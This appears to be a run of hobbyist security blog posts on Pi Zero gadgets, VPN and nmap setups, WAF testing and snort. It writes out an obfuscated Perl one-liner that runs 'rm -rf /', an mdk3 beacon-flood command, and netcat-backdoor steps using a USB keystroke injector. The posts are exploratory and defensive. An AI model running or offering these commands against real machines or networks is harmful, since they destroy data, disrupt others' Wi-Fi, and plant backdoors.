8 Security Predictions for 2017


What will 2017 hold for the security industry?    I sat down and looked into my crystal ball and came up with these 8 security predictions for 2017. 

A Fortune 500 Will Use “DDOS as a Service” To Attack A Competitor.
A bored VP of Marketing with a paypal account, a six pack and a nephew who can get him on the “undernet” is the cyber warrior of the future.
Internet of Thing (IoT) will continue to be used as an attack platform.
Who would have thought that un-patched, un-maintained linux operating systems exposed to the internet would be used to do evil?
Hacking As A Service Will Take Off.
Want into your bosses/spouses/political opponents email account? A hacking group will sell you access for $500.
Hackers Discover & Exploit Automation Platforms.
Hackers finally realize they only have to own the automation platform (Chef, Puppet and SaltStack) of most companies to own the whole company.
Red-Teaming Will Still Be easy.
…and there will be 437 conference talks about how awesome it is.
A Killer Android Bug Will Be Found.
A remotely exploitable android bug that allows for remote camera, microphone and speaker access will be found and will be un-patchable on 75% of phones. Causing Google to take control of the OS and push patches to all phones.
Hackers Will Interrupt A Major Sporting Event.
Just think what would happen if the Russians, Chinese or a 400-pound hacker sitting on his bed decided to take Fox offline during the opening kickoff.
Security Will Still Be Hard.
…and no one as invented the magic box you can plug into your network and make it easy.
Remember though… you can change the future of security in 2017 by working hard and doing something that makes a difference.  Get involved in the EFF,  write some amazing open source software,  volunteer to mentor someone interested in security.

KaliZero: A piZero USB Gadget Running Kali

I have been playing with my stack of pizero a bunch lately and tonight I decided to put together a piZero OTG Ethernet gadget that runs Kali (Really KaToolin),  XRDP and Mate in a computer on a stick configuration.  This way I have a full (as I want it to be) Kali installation with me as long as I have access to a USB port.

Here are the steps to build your own:
Install your pizero as an ethernet gadget.
Share your internet connection with your piZero:

You can now login into your PiZero at:
[email protected]

Copy and Run this shell script:
sudo reboot
Configure RDP and access your KaliZero:
Use KaToolin to install the tools you want:
sudo katoolin
**Be Warned:  The piZero is slow.  It is usable for basic tasks but is not amazing.

Installing netcat backdoors with a piZero

I have been playing with my stack of piZero’s recently and started to read about the kernel OTG gadgets and was intrigued by the OTG_HID gadget.  So after doing some reading I found that someone had ported the USB Rubber Ducky platform to the piZero and called it rspiducky.
Building it is fairly straight forward but if you if you want a ready made solution I put a precompiled copy of the .img file here.
Once you get the image to your SD card (sudo dd if=duckberrypi_zero_minibian_05.img of=/dev/disk*/ bs=4m) you then start putting your payload into (surprise) payload.dd.
It is amazingly easy to drop a NetCat backdoor using this method.  You just need a publically available server you can run nc -l -p 443 -vvv on. 
Here is a non-persistent example:
Here is a persistent example via a cron job:
Here is the script running:

Here is what the NC backdoor looks like:

Bonus Scripts:

Type the longest word in the world 100,000 times:

Hide all windows 100,000 times:
Hello World test script:

As always have fun and only do good with these tools. 

Spoofing Beacon Frames From The 5000 Most Common SSIDS

I have been reading a lot about Beacon Frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames.  I couldnt pass up a chance to test this so I pulled out my trusty TL-WN722N and made a list of the 5,0000 most common SSIDS from wiggle.net.
Here are the commands to run it assuming your wireless interface is WLAN0:
Grab the commonssids.txt from my gist:
wget https://gist.githubusercontent.com/jgamblin/da795e571fb5f91f9e86a27f2c2f626f/raw/0e5e53b97e372a21cb20513d5064fde11aed844c/commonssids.txt
Start airmon-ng:
airmon-ng start wlan0

Start MDK3 with the string:
mdk3 wlan0mon b -f commonssids.txt -g -t -m -s 1000

Here are the command flags: 
b - Beacon Flood Mode
f - Read SSIDs from file
g - Show station as 54 Mbit
t - Show station using WPA TKIP encryption
m - Use valid accesspoint MAC from OUI database

Here is what the output looks like:

Here is what the wireless list looks like on a host:

As always be careful using this anywhere that it could cause issues with other people’s internet access.  No one likes a jerk.

PiZero USB VPN SideCar

Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start  working on it.   I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use the PiZero to offload some slow processes (big nmap scans) and as a place to verify findings through an always on VPN connection (I like and use Private Internet Access).
Configuration  is fairly simple and only takes about 30 minutes: 
Install your pizero as an ethernet gadget.
Share Your Internet Connection With Your PI:

You can now login into your PiZero at:
[email protected]

Update Your Pi and install OpenVPN:
sudo apt-get update && sudo apt-get -y dist-upgrade
sudo apt-get -y install openvpn
wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
unzip openvpn.zip -d openvpn
sudo cp openvpn/ca.rsa.2048.crt openvpn/crl.rsa.2048.pem /etc/openvpn/
sudo cp "openvpn/US Texas.ovpn" "/etc/openvpn/Texas.conf"
#You can use a diffrent VPN endpoint if you like. Note the extension change from ovpn to conf.
sudo reboot

Create /etc/openvpn/login containing only your username and password, one per line, for example:
Change the permissions on this file so only the root user can read it:
sudo chmod 600 /etc/openvpn/login
Setup OpenVPN to use your stored username and password by editing the the config file for the VPN endpoint:
sudo nano /etc/openvpn/Texas.conf
Change the following lines so they go from this:
auth-user-pass > auth-user-pass /etc/openvpn/login
crl-verify crl.rsa.2048.pem > crl-verify /etc/openvpn/crl.rsa.2048.pem
ca ca.rsa.2048.crt > ca /etc/openvpn/ca.rsa.2048.crt
Test VPN:
sudo openvpn --config /etc/openvpn/Texas.conf
If the VPN is working you will see:

Next step is to enable VPN at boot:
sudo systemctl enable openvpn@Texas
sudo reboot
After reboot verify VPN connection:

You now have an always on PiZero USB VPN SideCar! Have fun.   🙂

Continuous Network Monitoring

I am often asked  “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.”   While that is simple advice it is a lot harder to implement.   One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans) for $40,000 a year.
After I cried for the state of my industry I told them I could do this for them with a small shell script, a $5 a month Digital Ocean Droplet and a free Sendgrid account.
Here is how I did it:

  • Created a free Sendgrid account.
  • Spun up $5 a Month Digitalocean Ubuntu Droplet.
  • Added a nmaper.company.com DNS record to be perfectly clear waht the box was doing.
  • Updated and installed needed software:
    sudo apt-get update && sudo apt-get dist-upgrade
    sudo apt-get install ssmtp nmap xsltproc
  • Created necessary folders:
    mkdir /root/nmap/
    mkdir /root/nmap/diffs
  • Edit /etc/ssmtp/ssmtp.conf with this:
    [email protected]
    [email protected]
  • Copy this to /root/namp/scan.sh:
    TARGETS="jerrygamblin.com scanme.nmap.org"
    OPTIONS="-v -sV -T4 -F --open"
    date=$(date +%F%T)
    cd ~/nmap/diffs
    nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null
    /usr/sbin/ssmtp [email protected] <<EOF
    From: [email protected]
    Subject: nmap ndiff$(date +"%Y-%m-%d")*** NDIFF RESULTS ***
    $(cat diff-$date)
    if [ -e scan-prev.xml ]; then
    ndiff scan-prev.xml scan-$date.xml > diff-$date
    [ "$?" -eq "1" ] && email
    ln -sf scan-$date.xml scan-prev.xml
  • Test (add cat diff-$date to bottom of the script to see output.)
  • Add a cron job to crontab to run every 15 minutes (or hour for bigger networks)
  • Talk your boss into buying you something awesome with the $39,970 in savings.

It was as simple as that and I put this together in an afternoon.  Up next is to build a Slackbot and an  to deliver the differences to their slack channel.

Ubuntu Remote Desktop On Digital Ocean

I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it  down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet :
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session> ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart
From there you can use any RDP viewer to connect to your droplet: Screen Shot 2016-10-19 at 9.15.22 PM

‘rm -rf /’ still works on OSX

Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Due to some really clever code obfuscation  it runs rm -rf /.
You  can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
While trying to figure out how this code code I stumbled upon the fact that OSX does not require  --no-preserve-root which has been required since version 6.4 of GNU Core Utilities which was released in 2006.
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'  on Ubuntu 16:10:
Screen Shot 2016-10-16 at 7.54.36 PMHere is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'  on MacOS 10.12:
2016-10-16 19.59.13
This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.

WAF Testing With Random User Agents.

Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website.   I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.
First I went with the old standby of CURL which does the job but I was only able to do 10 requests in 4 seconds.
Here is what the output of curl.sh looks like:

That was not going to be fast enough for my testing needs so I switch to Apache Bench and am able to do 1,000 requests in 2 seconds. Which was what I need to do proper testing.
Here is what the output of ab.sh looks like:

All the scripts are in this GitHub Repo.
As always:  Use these for good, not bad.

WebSnort Docker Container

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with  snort -dv -r test.pcap but the output is not great.
I have been using a tool called websnort for better output recently and decided it was time to put it into a docker container for easy portability.
Screen Shot 2016-08-25 at 7.48.51 AM
To run it: 
docker run -d -p 8080:8080 jgamblin/websnort
If you want to build your own the  dockerfile is:
FROM ubuntu:latest
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update && apt-get install python-pip snort -y
RUN chmod a+r /etc/snort/snort.conf
RUN pip install websnort
CMD websnort
 malware-traffic-analysis.net has great PCAPs for testing your security tools.

Site Footer